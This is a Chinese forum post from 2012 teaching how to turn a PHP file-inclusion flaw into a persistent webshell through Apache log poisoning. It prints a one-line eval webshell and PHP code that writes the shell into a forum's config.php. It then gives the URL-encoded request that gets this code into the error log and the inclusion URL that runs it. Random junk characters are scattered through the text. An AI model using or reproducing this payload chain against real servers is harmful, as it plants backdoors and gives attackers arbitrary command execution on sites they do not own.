标题: php包含apache日志写马 [打印本页] 作者: admin 时间: 2012-9-15 14:27 标题: php包含apache日志写马 因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 ! J; L# G M G' {. X* P1 I I # ?' a- A" R H# R A比如还是这句一句话木马 ( t3 P* {4 [- T% o$ ?
<?eval($_POST[cmd]);?> # s: ]2 m, x" M! W$ k' x8 t
0 q2 i! U$ C& ?/ _8 Q) t; D! Y; V到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 7 w4 q, O+ e5 F( e0 M z
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 : m+ Y9 p( F0 ^; M. Y. t b - d g" L' k6 I<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); 6 g, w \0 c$ ?$ K& s
fclose($fp);?> //在config.php里写入一句木马语句 * }: {6 O( J* w% s$ x& r' V' N6 I$ X# G( c9 d3 m
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 # v% {. @# D: G% x) u转换为 * H( D$ E' m5 s: i2 m
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F ( U u. G3 @0 S% u+ @# S0 Y9 R
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp # y3 M. G, m5 O7 a* R
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B * k2 E$ G( a7 H0 Qfclose%28%24fp%29%3B%3F%3E 6 X( {8 [4 W3 d# _& G5 F8 E我们提交 9 p( Y% r& `6 Q X; y4 P http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww , ?: k1 H0 m. b/ u- ^5 ^
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp 7 r; C' d# o% g6 N' b%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B + U* y3 |& j. K! S+ }/ f4 Y7 ncmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E 8 R8 r7 z) y/ w) Z% V
6 D/ @% P! W9 J- P; d: N4 V# p
这样就错误日志里就记录下了这行写入webshell的代码。 ; ^5 r, W" m& G( Y! V5 k
我们再来包含日志,提交 . s5 V8 {9 x+ X! [0 n0 k% Phttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log : d4 U9 d/ V7 v